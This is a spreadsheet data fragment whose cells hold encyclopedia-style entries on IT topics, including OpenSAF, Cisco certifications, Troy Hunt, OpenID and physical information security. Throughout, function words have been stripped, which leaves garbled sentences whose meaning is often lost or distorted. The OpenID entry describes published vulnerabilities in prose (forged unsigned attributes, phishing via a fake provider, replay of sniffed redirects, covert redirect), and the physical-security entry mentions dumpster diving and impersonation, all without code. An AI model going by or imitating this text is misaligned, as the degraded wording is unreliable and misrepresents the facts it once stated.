2-tier architecture. 3-tiered architecture, opensaf services partitioned service director, service node-director agent. director part opensaf service central service intelligence. typically process controller node. node directors co-ordinate node scoped service activities messaging central director local agents. agent provides service capabilities available clients (shared) linkable library exposes well-defined service apis application processes. agents typically talk service node directors servers. opensaf services modularly classified core services amf, clm, imm, log, optional services evt, ckpt, lck, msg, plm, smfthe optional services enabled disabled build/packaging opensaf. opensaf configured tipc underlying transport. nodes dynamically added/deleted to/from opensaf cluster time. opensaf cluster scales well several hundred nodes. opensaf supports following language bindings interface apis: c/c++ java bindings (for services) python bindings opensaf provides command-line tools utilities management opensaf cluster applications.the modular architecture enables addition services well adaptation existing services. opensaf services designed support in-service upgrades. services following forum's services implemented opensaf 5.0. availability management framework (amf) described above. cluster membership service (clm) determines whether node healthy enough part cluster. provides mechanism track cluster nodes interacting tracking status underlying os/hardware. checkpoint service (ckpt) saving application states incremental updates used restore service failover switchover. event service (evt) provides publish-subscribe messaging model used keeping applications management entities sync events happening cluster. information model management service (imm) described above. lock service (lck) supports distributed lock service model support shared locks exclusive locks. service (log) means recording files) functional changes happening cluster, support logging diverse record formats. debugging error tracking. supports logging alarms notifications occurring cluster. messaging service (msg) supports cluster-wide messaging mechanism multiple senders single receiver well message-group mechanisms. notification service (ntf) provides producer/subscriber model system management notifications enable fault handling. used alarm fault notifications support recording history fault analysis. supports notification formats itu-t x.730, x.731, x.733, x.736 recommendations. platform management service (plm) provides mechanism configure logical view underlying hardware (fru) provides mechanism track status hardware (fru) perform administrative operations coordination opensaf services applications. software management framework (smf) support automated in-service upgrade application, middleware, across cluster. supporters network equipment providers primary users products based opensaf code base, integrating products network service providers, carriers, operators. many network equipment providers demonstrated support opensaf joining foundation and/or contributing open source project. current foundation members include: ericsson, oracle. several providers computing communications technology also indicated support opensaf initiative including, openclovis safplus, emerson network power embedded computing, continuous computing, wind river, infusion, tail-f, aricent, rancore technologies, goahead software, montavista software. uses opensaf commonly used achieve carrier-grade (five-nines) service availability. opensaf functionally complete lacks ecosystem modeling tools available open-source solutions like kubernetes docker swarm. also saforum scope alliance openhpi list cluster management software cloud native computing foundation references external links official website opensaf sourceforge forum wayback machine (archived 2008-10-06)</t>
  </si>
  <si>
    <t>XML Certification Program</t>
  </si>
  <si>
    <t>certification program (xml master) professional certification related technologies. there levels certifications, master basic certification master professional certification, 18,000 people passed examinations. certification paths master professional application developer certification master professional application developer certificate professionals demonstrated ability technology developing applications deal data. based passing master basic exam master professional application developer exam. master professional application developer certification exam duration minutes number questions required passing score exam topics section section programming section xslt section schema section processing system design technology section utilizing master professional database administrator certification master professional database administrator certificate professionals demonstrated ability technology xquery xmldb. requires passing master basic exam master professional database administrator exam. master professional database administrator certification exam duration minutes minutes number questions required passing score exam topics section overview section xquery, xpath section manipulating data section creating schema other database objects master basic certification master basic certification professionals demonstrated ability related technologies, based passing master basic certification exam. master basic certification exam duration minutes minutes number questions minimum passing score exam topics section overview section creating documents section section schema section xslt, xpath section namespace external links certification program (xml master) official website introduction certification program: master master certification practice exam master certification success stories</t>
  </si>
  <si>
    <t>CCNP</t>
  </si>
  <si>
    <t>cisco certified network professional (ccnp) person industry achieved professional level cisco career certification. professional certifications prior february 2020 approximately eight professional-level certification programs within cisco career certifications. ccdp ccnp cloud ccnp collaboration ccnp data center ccnp routing switching ccnp security ccnp service provider ccnp wirelesscisco announced february 2020, format retired replaced following: ccnp enterprise (integrating ccnp routing switching, ccdp ccnp wireless) ccnp data center (integrating ccnp cloud) ccnp security ccnp service provider ccnp collaboration cisco certified devnet professionalmigration guides newer certification exams available cisco ccnp migration tools page. required exams starting february 2020, entry-level certification required attempt ccnp exams. relevant entry-level certifications need passed advance, someone wants attempt professionals level exams. associate-level certification programs are: ccda, ccna cloud, ccna collaboration, ccna cyber ops, ccna data center, ccna industrial, ccna routing switching, ccna security, ccna service provider ccna wireless. each area expertise requires passing relevant exams certification professional understanding capability networking. example, ccnp routing switching consists three exams: implementing routing (route), implementing switched networks (switch) troubleshooting maintaining networks (tshoot). validity validity ccnp certification years. renewal requires certification holders register pass higher level cisco recertification exam(s) every years. related certifications associate-level certification: ccna expert-level certification: ccie references ccnp training network kings</t>
  </si>
  <si>
    <t>CCNA</t>
  </si>
  <si>
    <t>ccna (cisco certified network associate) information technology (it) certification cisco systems. ccna certification associate-level cisco career certification.the cisco exams changed several times response changing trends. 2020, cisco announced update certification program "consolidated updated associate level training certification." cisco consolidated previous different types cisco-certified network associate general ccna certification.the content exams proprietary. cisco learning partners offer variety different training methods, including books published cisco press, online classroom courses available title "interconnecting cisco network devices". exam achieve ccna certification, candidates must earn passing score cisco exam #200-301. completion exam, candidates receive score report along score breakdown exam section passing score given exam.the exam tests candidates knowledge skills required install, operate, troubleshoot small medium size enterprise branch network. this exam covers broad range fundamentals, including network fundamentals, network access, connectivity, services, security fundamentals, automation programmability. prerequisites there prerequisites take ccna certification exam. there also starting point networking (cisco certified technician). validity validity ccna certification years. renewal requires certification holders register pass higher level cisco certification exam(s) every years. also cisco certifications devnet cyber ccnp ccie certification references links ccna</t>
  </si>
  <si>
    <t>ASC X9</t>
  </si>
  <si>
    <t>accredited standards committee (asc inc.) ansi (american national standards institute) accredited standards developing organization, responsible developing voluntary open consensus standards financial services industry u.s.asc technical advisory group (tag) international technical committee financial services iso/tc international organization standardization (iso), geneva, switzerland, submits american national standards international committee considered adoption international standards standards. membership open u.s. domiciled companies organizations financial services industry. domestic role accredited standards committee develops, establishes, maintains, promotes standards financial services industry united states order facilitate delivery financial services products. committees composed five subcommittees based financial services business sectors: retail payments (including mobile payments card present fraud group); checks back-office operations (all things related checks); corporate banking (b2b payments balance transaction reporting standard (btrs) standard); securities (stocks bonds, cusip); data information security (methods cryptography secure financial data). standards examples standards commonly used today around world are: paper electronic check standards owns nearly standardized real estate front back checks, magnetic character record originally developed credit debit card transactions standard operating card transactions first developed numerous data security standards financial services including "pin" personal identification standard wide today. data encryption standard (des) successor triple current encryption security algorithm used securing banking transactions worldwide. references external links official website</t>
  </si>
  <si>
    <t>ASCII (squat)</t>
  </si>
  <si>
    <t>amsterdam subversive center information interchange (ascii) squatted communication laboratory dutch city amsterdam. first incarnation formed 1999, based herengracht 243a. moved following locations: jodenbreestraat kinkerstraat 92-94, kostverlorenkade wibautstraat javastraat.ascii became legalised moved jodenbreestraat january 2000, alongside radical bookshop fort sjakoo, started squatting faced 900% rent increase.the original provide free internet work space activists squatters promote open source operating systems linux free software programs openoffice.org mozilla. members collective scavenged rebuilt computers trash. 2005, ascii involved plan free community wireless internet access across amsterdam. 2006, javastraat evicted group declared shift towards hacklab rather physical space. also hackerspace squatting social centre references external links archived ascii website pictures amsterdam ascii internet cafe squat, 1999</t>
  </si>
  <si>
    <t>ASafaWeb</t>
  </si>
  <si>
    <t>troy adam hunt australian security consultant known public education outreach security topics. created have been pwned?, data breach search website allows users personal information compromised. also authored several popular security-related courses pluralsight, regularly presents keynotes workshops security topics. created asafaweb, tool formerly performed automated security analysis asp.net websites. data breaches part work administering have been pwned? (hibp) website, hunt involved publication data breaches october 2021, journalists cite cybersecurity expert data-breach expert.as june 2018 hibp recorded billion compromised user-accounts. governments australia, united kingdom spain service monitor official domains. popular services, 1password, online, okta kogan integrated hibp account-verification process. gizmodo included hibp october 2018 list "100 websites that shaped internet know it".in august 2015, following ashley madison data breach, hunt received many emails ashley madison members asking help. criticized company poor informing userbase.in february 2016 children's toy-maker vtech, suffered major data breach months earlier, updated terms service absolve wrongdoing event future breaches. hunt, added data vtech's breach databases have been pwned?, published blog post harshly criticizing vtech's policy, calling "grossly negligent". later removed vtech breach database, stating people besides access data wishing reduce chance spread.in february 2017 hunt published details vulnerabilities internet-connected children's toy, cloudpets, allowed access 820,000 user records well million audio files belonging users.in november 2017 hunt testified united states house committee energy commerce impact data breaches.also november 2017 hunt joined report uri, project (launched 2015 scott helme) allows real-time monitoring hpkp violations website. planned bring funding expertise project. education hunt known efforts security education computer professionals. created several dozen courses pluralsight, online education training website computer creative professionals. primary course authors pluralsight's ethical hacking path, collection courses designed certified ethical hacker certification.additionally, hunt works education speaking technology conferences running workshops. primary workshop, titled hack yourself first, aims teach software developers little security background defend applications looking attacker's perspective. awards achievements 2011–present microsoft developer security. 2016–present microsoft regional director. 2018 auscert's individual excellence information security award. 2018 grand prix prize best overall security blog, european security blogger award. references external links media related troy hunt wikimedia commons official website</t>
  </si>
  <si>
    <t>CCIE Certification</t>
  </si>
  <si>
    <t>cisco certified internetwork expert, ccie, technical certification offered cisco systems. cisco certified internetwork expert (ccie) cisco certified design expert (ccde) certifications established assist industry distinguishing echelon internetworking experts worldwide assess expert-level infrastructure network design skills worldwide. these certifications generally accepted worldwide prestigious networking certifications industry. ccie ccde community established reputation leading networking industry deep technical networking knowledge deployed technically challenging network assignments. expert-level certification program continually updates revises testing tools methodologies ensure maintain program quality, relevance value. through rigorous written exam performance-based exam, expert-level certification programs standard internetworking expertise.the program currently divided different areas expertise "tracks". choose pursue multiple ccie tracks several different categories cisco technology: routing switching, service provider, security, collaboration, data center, wireless. ccie requirements ccie candidates must first pass written exam corresponding hands-on exam. though formal requirements take ccie certification exam, in-depth understanding topics covered exams three five years experience expected attempting certification. there test sets requirement certification written exam duration minutes, questions multiple choice simulation. exam hours exam (one day), previously, ccie exams full exams.details: ccie routing switching exam consists 2-hour troubleshooting section, 30-minute diagnostic section, 5-hour minute configuration section. format differs track. eight-hour exam tests ability configure actual equipment troubleshoot network timed test situation. must make initial attempt ccie exam within 18-months passing ccie written exam. candidates pass must reattempt exam within months last scored attempt order written exam remain valid. pass exam within three years passing written exam, must retake written exam allowed attempt exam again. overview ccie exam ccie exam first introduced 1993 two-day test. overwhelming demand ccie certification, waiting time taking exam least months. october 2001, cisco updated exam removing testing measures like diagramming, addressing troubleshooting.when ccie test days: first comprised: building network patching, addressing, configuration terminal servers: verification method performance whole layer configurations. before 5:15 proctor would mark capability, decide whether able attend second-day exam passing pass mark first day. second day: would receive another paper covered configuration tasks morning session.to configure devices correctly, aware core technologies. there various hazards understand well demonstrating basic networking knowledge practical experience. proctor would observe process know whether attend afternoon exam session troubleshooting field day.the current ccie exam consists eight hours within day. there three sections test. troubleshooting module, diagnostic module configuration module. process examination ensures evaluations capabilities understanding essence networking knowledge candidates.you would receive result exam within hours. failing score reports incorporate details mark primary topic ranges. pass exam, receive pass result without details statement. many centers across (e.g. california) closed down, leaving richardson, texas open. 2020 available cities, worldwide, take exam: bangalore, beijing, brussels, dubai, feltham, hong kong, johannesburg, krakow, mexico city, moscow, richardson, riyadh, paulo, shanghai, singapore, sydney, tokyo toronto. tracks expert certification there seven tracks expert level certifications. designed requirement industry. updated time, latest tracks verified ccie official website. ccde expert-level network design engineers capable translating business needs, budget, operational constraints design converged solution. ccie routing switching: popular ccie track. expert-level network engineers plan, operate troubleshoot complex, converged network infrastructure. ccie collaboration: suitable expert level collaboration architects, unified communications architects, voice video network managers. ccie data center: expert planning, design, implementation management complex, modern data center infrastructure. ccie security: concerning modern security risks, threats, vulnerabilities, security experts knowledge skills architect, engineer, implement, troubleshoot, support full suite cisco security technologies solutions using latest industry best practices secure systems environments. ccie service provider: expert-level (internet service provider) network engineers bring knowledge skill build extensible service provider infrastructure deliver rich managed services. ccie wireless: expert able demonstrate broad theoretical knowledge wireless networking solid understanding wireless local area networking (wlan) technologies cisco. ccie emeritus active ccie holders able apply ccie emeritus status reach tenth anniversary ccie certification. lifetime emeritus tenure applicable candidates maintains ccie active emeritus status consecutive years. necessary submit application ccie emeritus within days date license expiry date. ccie emeritus status generally applies moved "day day" network technical work would like stay involved ccie program serving ambassadors current future ccie programs. ccie emeritus status holder non-active ccie holder candidates recognized technical proficiency long term status within ccie program. ccie emeritus holders opportunity re-enter active ccie status taking current ccie-level written exam. continuing education program continuing education program alternative re-certification ccie license instead passing written exam. this program managed according three core principles: flexibility, diversity integrity. flexibility: allowing individuals wide range options re-certification. diversity: several options training: online courses, instructor-led training authoring content. integrity: achieved cisco authorized content providers re-certification requirements validate credits submitted individual. relevance real-world situations regarding approach networking software-defined networking, critics ccie certifications challenge corner-case scenarios written exams. however, principle networking still regardless whether router switch physical device piece software, fundamental networking operations remain real-world internetworking. ccie holders still relevant software-defined networking era. also ccna ccnp cisco certifications references</t>
  </si>
  <si>
    <t>AT Internet</t>
  </si>
  <si>
    <t>internet privately held company provides analytics services consulting websites, intranet, mobile sites mobile applications. provided services since 1995. company commonly known (especially france) former name flagship product xiti. internet's application, analytics suite, used approximately 20,000 websites mobile applications worldwide. history company founded 1995 owner alain llorens agency. group's focus shifted analytics 1997.in 2011, internet recognized "strong performer" "the forrester wave: analytics, 2011" report forrester research inc.in 2014, internet featured latest edition forrester's report, "the forrester wave: analytics, 2014" named providers analytics software worldwide.in 2015, internet launched analytics suite, integrated suite applications analytics reporting, dashboard creation, data visualization, data mining, analytics data export.in 2016, company raised total million funding recruiting bpifrance, cic, coface, european regional development fund, nouvelle-aquitaine region (after raised €6.5 million 2013).in 2021, internet acquired piano software inc. undisclosed amount. products services internet provides tools enabling companies organizations measure analyse visitors arrive website (mobile site, mobile application), well subsequent actions behaviors site. this information visualized dashboards reports, shared across organization.at internet's software integrated approximately digital marketing applications.the company offers specialized consulting services, on-site remote. certifications privacy france's data protection authority, cnil, recognized internet's analytics suite full compliance french cookie regulations. audience measurement application granted exemption cnil obtaining cookie consent.the analytics suite certified independent measurement organizations worldwide including uk's abc, kia-index, saarland, espana, france's acpm. according company, software complies requirements european commission's general data protection regulation, data processed europe stored proprietary servers france. references external links official website</t>
  </si>
  <si>
    <t>OpenID</t>
  </si>
  <si>
    <t>openid open standard decentralized authentication protocol promoted non-profit openid foundation. allows users authenticated co-operating sites (known relying parties, using third-party identity provider (idp) service, eliminating need webmasters provide login systems, allowing users multiple unrelated websites without separate identity password each. users create accounts selecting openid identity provider, accounts sign website accepts openid authentication. several large organizations either issue accept openids websites.the openid standard provides framework communication must take place identity provider openid acceptor (the "relying party"). extension standard (the openid attribute exchange) facilitates transfer user attributes, name gender, openid identity provider relying party (each relying party request different attributes, depending requirements). openid protocol rely central authority authenticate user's identity. moreover, neither services openid standard mandate specific means authenticate users, allowing approaches ranging common (such passwords) novel (such smart cards biometrics). final version openid openid 2.0, finalized published december 2007. term openid also refer identifier specified openid standard; identifiers take form unique uniform resource identifier (uri), managed "openid provider" handles authentication. adoption march 2016, billion openid-enabled accounts internet (see below) approximately 1,100,934 sites integrated openid consumer support: aol, flickr, google, amazon.com, canonical (provider name ubuntu one), livejournal, microsoft (provider name microsoft account), mixi, myspace, novell, openstreetmap, orange, sears, sun, telecom italia, universal music group, verisign, wordpress, yahoo!, bbc, ibm, paypal, steam, although organizations also authentication management. many larger organizations require users provide authentication form existing email account mobile phone number order sign account (which used openid identity). there several smaller entities accept sign-ups extra identity details required. facebook openid past, moved facebook connect. blogger also used openid, since 2018 longer supports technical overview user entity wants assert particular identity. relying party (rp) site application wants verify user's identifier. other terms party include "service provider" obsolete "consumer". identity provider, openid provider (op) service specializes registering openid urls xris. openid enables user communicate relying party. this communication done exchange identifier openid, chosen user name user's identity. identity provider provides openid authentication (and possibly identity services). exchange enabled user-agent, program (such browser) used user communicate relying party openid provider. logging user interacts relying party (such website) provides option specify openid purposes authentication; user typically previously registered openid (e.g. alice.openid.example.org) openid provider (e.g. openid.example.org).the relying party typically transforms openid canonical form (e.g. http://alice.openid.example.org/). with openid 1.0, relying party requests html resource identified reads html link discover openid provider's (e.g. http://openid.example.org/openid-auth.php). relying party also discovers whether delegated identity (see below). with openid 2.0, relying party discovers openid provider requesting xrds document (also called yadis document) content type application/xrds+xml; document available target always available target xri.there modes relying party communicate openid provider: checkid_immediate, relying party requests openid provider interact user. communication relayed user's user-agent without explicitly notifying user. checkid_setup, user communicates openid provider user-agent used access relying party.the checkid_immediate mode fall back checkid_setup mode operation cannot automated. first, relying party openid provider (optionally) establish shared secret, referenced associate handle, relying party stores. using checkid_setup mode, relying party redirects user's user-agent openid provider user authenticate directly openid provider. method authentication vary, typically, openid provider prompts user password cryptographic token, asks whether user trusts relying party receive necessary identity details. user declines openid provider's request trust relying party, user-agent redirected back relying party message indicating authentication rejected; relying party turn refuses authenticate user. user accepts openid provider's request trust relying party, user-agent redirected back relying party along user's credentials. that relying party must confirm credentials really came openid provider. relying party openid provider previously established shared secret, relying party validate identity openid provider comparing copy shared secret received along user's credentials; relying party called stateful stores shared secret sessions. contrast, stateless dumb relying party must make background request (check_authentication) ensure data indeed came openid provider. after openid verified, authentication considered successful user considered logged relying party identity specified given openid (e.g. alice.openid.example.org). relying party typically stores user's openid along user's session information. identifiers obtain openid-enabled used openid-enabled websites, user registers openid identifier identity provider. identity providers offer ability register (typically third-level domain, e.g. username.example.com) automatically configured openid authentication service. once registered openid, user also existing control (such blog home page) alias "delegated identity". they simply insert appropriate openid tags html serve yadis document.starting openid authentication (and implementations), types identifiers used openid: urls xris. xris form internet identifier designed specifically cross-domain digital identity. example, xris come forms—i-names i-numbers—that usually registered simultaneously synonyms. i-names reassignable (like domain names), i-numbers never reassigned. when i-name used openid identifier, immediately resolved synonymous i-number (the canonicalid element xrds document). this i-number openid identifier stored relying party. way, user relying party protected user's openid identity ever taken another party happen based reassignable name. openid foundation openid foundation (oidf) promotes enhances openid community technologies. oidf non-profit international standards development organization individual developers, government agencies companies wish promote protect openid. openid foundation formed june 2007 serves public trust organization representing open community developers, vendors users. oidf assists community providing needed infrastructure help promoting supporting adoption openid. this includes managing intellectual property trade marks well fostering viral growth global participation openid. people openid foundation's board directors community board members eight corporate board members: chapters oidf global organization promote digital identity encourage adoption openid, oidf encouraged creation member chapters. member chapters officially part foundation work within constituency support development adoption openid framework user-centric identity internet. intellectual property contribution agreements oidf ensures openid specifications freely implementable therefore oidf requires contributors sign contribution agreement. this agreement grants copyright license foundation publish collective specifications includes patent non-assertion agreement. non-assertion agreement states contributor someone implementing openid specifications. legal issues openid trademark united states assigned openid foundation march 2008. registered netmesh inc. openid foundation operational. europe, august 2007, openid trademark registered openid europe foundation.the openid logo designed randy "ydnar" reddig, 2005 expressed plans transfer rights openid organization.since original announcement openid, official site stated: nobody this. nobody's planning making money this. goal release every part liberal licenses possible, there's money licensing registering required play. benefits community whole something like exists, we're part community. microsystems, verisign number smaller companies involved openid issued patent non-assertion covenants covering openid specifications. covenants state companies assert patents openid implementations revoke promises anyone threatens, asserts, patents openid implementors. security authentication bugs march, 2012, research paper reported generic security issues openid. both issues allow attacker sign victim's relying party accounts. first issue, openid google identity provider openid) published security advisories address google's advisory says attacker could forge openid request user's email address, insert unsigned email address idps response. attacker relays response website notice attribute unsigned, website tricked logging attacker local account." research paper claims many popular websites confirmed vulnerable, including yahoo! mail, smartsheet.com, zoho, manymoon.com, diigo.com. researchers notified affected parties, fixed vulnerable code. second issue, paper called "data type confusion logic flaw", also allows attackers sign victims' accounts. google paypal initially confirmed vulnerable. openid published vulnerability report flaw. report says google paypal applied fixes, suggest openid vendors check implementations. phishing some observers suggested openid security weaknesses prove vulnerable phishing attacks. example, malicious relaying party forward user bogus identity provider authentication page asking user input credentials. completion this, malicious party (who case also controls bogus authentication page) could access user's account identity provider, user's openid services. attempt combat possible phishing attacks, openid providers mandate user needs authenticated prior attempt authenticate relying party. this relies user knowing policy identity provider. december 2008, openid foundation approved version provider authentication policy extension (pape), "enables relying parties request openid providers employ specified authentication policies authenticating users openid providers inform relying parties policies actually used." privacy trust issues other security issues identified openid involve lack privacy failure address trust problem. however, problem unique openid simply state internet commonly used.the identity provider does, however, openid logins; know logged website, making cross-site tracking much easier. compromised openid account also likely serious breach privacy compromised account single site. authentication hijacking unsecured connection another important vulnerability present last step authentication scheme tls/ssl used: redirect-url identity provider relying party. problem redirect fact anyone obtain (e.g. sniffing wire) replay logged site victim user. some identity providers nonces (number used once) allow user site fail consecutive attempts. nonce solution works user first url. however, fast attacker sniffing wire obtain immediately reset user's connection attacker sniffing wire knows required sequence numbers) execute replay attack described above. thus nonces protect passive attackers, cannot prevent active attackers executing replay attack. tls/ssl authentication process significantly reduce risk. this restated (both client) common case (bob uses rp2) common case (rp1 vpn/ssl/tls secure connection client) preventable! then could obtain credentials sufficient impersonate end-if covert redirect 2014, dubbed "covert redirect related oauth openid" disclosed. discovered mathematics doctoral student wang jing school physical mathematical sciences, nanyang technological university, singapore.the announcement openid "'covert redirect', publicized 2014, instance attackers using open redirectors well-known threat, well-known means prevention. openid connect protocol mandates strict measures preclude open redirectors prevent vulnerability.""the general consensus, far, covert redirect bad, still threat. understanding makes dangerous requires basic understanding open redirect, exploited."a patch immediately made available. eisen, founder, chairman chief innovation officer 41st parameter told marquette poremba, distributed system, counting good nature participants right thing. cases like oauth openid, distribution vast unreasonable expect every website patch near future". history original openid authentication protocol developed 2005 brad fitzpatrick, creator popular community website livejournal, working apart. initially referred yadis acronym "yet another distributed identity system"), named openid openid.net domain name given apart project. openid support soon implemented livejournal fellow livejournal engine community deadjournal blog post comments quickly gained attention digital identity community. developer janrain early supporter openid, providing openid software libraries expanding business around openid-based services. late june, discussions started openid users developers enterprise software company netmesh, leading collaboration interoperability openid netmesh's similar light-weight identity (lid) protocol. direct result collaboration yadis discovery protocol, adopting name originally used openid. yadis announced october 2005. after discussion 2005 internet identity workshop days later, xri/i-names developers joined yadis project, contributing extensible resource descriptor sequence (xrds) format utilization protocol.in december, developers sxip identity began discussions openid/yadis community announcing shift development version simple extensible identity protocol (sxip) url-based identities like openid. march 2006, janrain developed simple registration (sreg) extension openid enabling primitive profile-exchange april submitted proposal formalize extensions openid. month, work also begun incorporating full support openid. around early may, openid developer david recordon left apart, joining verisign focus digital identity guidance openid spec. early june, major differences sxip openid projects resolved agreement support multiple personas openid submission identity provider rather full identity url. with this, well addition extensions support underway, openid evolving full-fledged digital identity framework, recordon proclaiming openid umbrella framework encompasses layers identifiers, discovery, authentication messaging services layer sits atop entire thing sort dubbed 'openid 2.0'. late july, sxip began merge digital identity exchange (dix) protocol openid, submitting initial drafts openid attribute exchange (ax) extension august. late 2006, zdnet opinion piece made case openid users, site operators entrepreneurs.on january 2007, symantec announced support openid identity initiative products services. week later, february microsoft made joint announcement janrain, sxip, verisign collaborate interoperability openid microsoft's windows cardspace digital identity platform, particular focus developing phishing-resistant authentication solution openid. part collaboration, microsoft pledged support openid future identity server products janrain, sxip, verisign pledged support microsoft's information card profile future identity solutions. mid-february, announced experimental openid provider service functional instant messenger (aim) accounts.in may, microsystems began working openid community, announcing openid program, well entering non-assertion covenant openid community, pledging assert patents implementations openid. june, openid leadership formed openid foundation, oregon-based public benefit corporation managing openid brand property. month, independent openid europe foundation formed belgium snorri giorgetti. early december, non-assertion agreements collected major contributors protocol final openid authentication openid attribute exchange specifications ratified december 5.in mid-january 2008, yahoo! announced initial openid support, provider relying party, releasing provider service month. early february, google, ibm, microsoft, verisign yahoo! joined openid foundation corporate board members. around early may, sourceforge, inc. introduced openid provider relying party support leading open source software development website sourceforge.net. late july, popular social network service myspace announced support openid provider. late october, google launched support openid provider microsoft announced windows live would support openid. november, janrain announced free hosted service, basic, allows websites begin accepting openids registration login without install, integrate configure openid open source libraries.in january 2009, paypal joined openid foundation corporate member, followed shortly facebook february. openid foundation formed executive committee appointed thibeau executive director. march, myspace launched previously announced openid provider service, enabling myspace users myspace openid. may, facebook launched relying party functionality, letting users automatic login-enabled openid account (e.g. google) facebook.in september 2013, janrain announced myopenid.com would shut february 2014; chart showed facebook google dominate social login space 2013. facebook since left openid; longer sponsor, represented board, permitting openid logins.in 2016, symantec announced would discontinuing pip.verisignlabs.com openid personal identity portal service.in march 2018, stack overflow announced openid support, citing insufficient usage justify cost. announcement, stated based activity, users strongly preferred facebook, google, e-mail/password based account authentication. openid versus pseudo-authentication using oauth openid single user credentials access multiple sites, oauth facilitates authorization site access information related user's account another site. although oauth authentication protocol, used part one. authentication context user accessing application tells application current user whether they're present. [...] authentication user presence application, internet-scale authentication protocol needs able across network security boundaries. however, oauth tells application none that. oauth says absolutely nothing user, user proved presence even they're still there. oauth client concerned, asked token, token, eventually used token access api. know anything authorized application even user all. fact, much point oauth giving delegated access situations user present connection client resource accessed. this great client authorization, really authentication whole point figuring user (and are). following drawing highlights differences using openid versus oauth authentication. note openid, process starts application asking user identity (typically openid uri), whereas case oauth, application directly requests limited access oauth token (valet key) access apis (enter house) user's behalf. user grant access, application retrieve unique identifier establishing profile (identity) using apis. attack pseudo-authentication openid provides cryptographic verification mechanism prevents attack users misuse oauth authentication. note valet describe user way, provides limited access rights, house (which even necessarily user's, key). therefore becomes compromised (the user malicious managed steal someone else's house), user impersonate house owner application requested authenticity. compromised point chain trust, malicious user intercept impersonate user application relying oauth2 pseudo authentication oauth authorization server. conversely, notarized letter contains user's signature, checked requesting application user, attack viable. verifying letter letter public-key cryptography authenticated. requesting application provides encryption public user, provides authentication server. authentication server encrypts document containing encryption corresponds one-way hash secret user knows (e.g. passphrase) challenge–response using application's public key. user passes encrypted document back application, decrypts application encrypts random phrase using received encryption key, asks user same, compares results, match, user authentic. openid connect (oidc) published february 2014 openid foundation, openid connect third generation openid technology. authentication layer oauth authorization framework. allows computing clients verify identity user based authentication performed authorization server, well obtain basic profile information user interoperable rest-like manner. technical terms, openid connect specifies restful http api, using json data format. openid connect allows range parties, including web-based, mobile javascript clients, request receive information authenticated sessions users. openid connect specification extensible, supporting optional features encryption identity data, discovery openid providers, session management. also references external links official website openid curlie</t>
  </si>
  <si>
    <t>Physical information security</t>
  </si>
  <si>
    <t>physical information security intersection, common ground physical security information security. primarily concerns protection tangible information-related assets computer systems storage media physical, real-world threats unauthorized physical access, theft, fire flood. typically involves physical controls protective barriers locks, uninterruptible power supplies, shredders. information security controls physical domain complement logical domain (such encryption), procedural administrative controls (such information security awareness compliance policies laws). background asset inherently valuable vulnerable wide variety threats, malicious (e.g. theft, arson) accidental/natural (e.g. lost property, bush fire). threats materialize exploit vulnerabilities causing incidents, likely adverse impacts organizations individuals legitimately utilize assets, varying trivial devastating effect. security controls intended reduce probability frequency occurrence and/or severity impacts arising incidents, thus protecting value assets. physical security involves controls smoke detectors, fire alarms extinguishers, along related laws, regulations, policies procedures concerning use. barriers fences, walls doors obvious physical security controls, designed deter prevent unauthorized physical access controlled area, home office. moats battlements mediaeval castles classic examples physical access controls, bank vaults safes. information security controls protect value information assets, particularly information (i.e. intangible information content, data, intellectual property, knowledge etc.) also computer telecommunications equipment, storage media (including papers digital media), cables tangible information-related assets (such computer power supplies). corporate mantra "our people greatest assets" literally true sense so-called knowledge workers qualify extremely valuable, perhaps irreplaceable information assets. health safety measures even medical practice could therefore also classed physical information security controls since protect humans injuries, diseases death. this perspective exemplifies ubiquity value information. modern human society heavily reliant information, information importance value deeper, fundamental level. principle, subcellular biochemical mechanisms maintain accuracy replication could even classed vital information security controls, given genes 'the information life'. malicious actors benefit physical access information assets include computer crackers, corporate spies, fraudsters. value information assets self-evident case say, stolen laptops servers sold-on cash, information content often valuable, example encryption keys passwords (used gain access systems information), trade secrets intellectual property (inherently valuable valuable commercial advantages confer), credit card numbers (used commit identity fraud theft). furthermore, loss, theft damage computer systems, plus power interruptions, mechanical/electronic failures physical incidents prevent used, typically causing disruption consequential costs losses. unauthorized disclosure confidential information, even coercive threat disclosure, damaging sony pictures entertainment hack 2014 numerous privacy breach incidents. even absence evidence disclosed personal information actually exploited, fact longer secured control rightful owners potentially harmful privacy impact. substantial fines, adverse publicity/reputational damage noncompliance penalties impacts flow serious privacy breaches best avoided, regardless cause! examples physical attacks obtain information there several ways obtain information physical attacks exploitations. examples described below. dumpster diving dumpster diving practice searching trash hope obtaining something valuable information carelessly discarded paper, computer disks hardware. overt access sometimes attackers simply building take information need. frequently using strategy, attacker masquerade someone belongs situation. they pose copy room employee, remove document someone's desk, copy document, replace original, leave copied document. individuals pretending building maintenance gain access otherwise restricted spaces. they might walk right building trash containing sensitive documents, carrying portable devices storage media left desks, perhaps memorized password sticky note stuck someone's computer screen called colleague across open office. examples physical information security controls shredding paper documents prior disposal prevent unintended information leakage. digital data encrypted securely wiped. offices require visitors present valid identification cards valid access keys. office workers required obey "clear desk" policies, protecting documents storage media (including portable devices) tidying away sight (for example locked drawers, filing cabinets, safes bank vault). workers required memorize passwords password manager instead writing passwords paper. computers vulnerable outages caused power cuts, accidental disconnection, flat batteries, brown-outs, surges, spikes, electrical interference electronic failures. physical information security controls address associated risks include: fuses, no-break battery-backed power supplies, electrical generators, redundant power sources cabling, remove" warning signs plugs, surge protectors, power quality monitoring, spare batteries, professional design installation power circuits plus regular inspections/tests preventive maintenance. also paper shredder physical security anti-computer forensics references external links social engineering fundamentals</t>
  </si>
  <si>
    <t>OpenHPC</t>
  </si>
  <si>
    <t>openhpc community-driven foss tools linux based hpc. openhpc specific hardware requirements. history birds-of-a-feather panel discussion titled "community supported repository management framework" convened 2015 edition international supercomputing conference. panel discussed common software components necessary build linux compute clusters solicited feedback community interest project. following response, openhpc project announced 2015 auspices linux foundation. releases design openhpc provides integrated tested collection software components that, along supported standard linux distribution, used implement full-featured compute cluster. components span entire software ecosystem including provisioning system administration tools, resource management, services, development tools, numerical libraries, performance analysis tools. architecture openhpc intentionally modular allow users pick choose provided components, well foster community open contribution. project provides recipes building clusters using centos (v8.3) opensuse leap (v15.2) x86_64 well aarch64 architectures. also cluster manager comparison cluster software list cluster management software references external links openhpc: comprehensive system software stack next platform openhpc pedal compute metal hpcwire openhpc pushes prove openness value sc16 high performance computing: 32nd international conference openhpc slack channel</t>
  </si>
  <si>
    <t>BPO security</t>
  </si>
  <si>
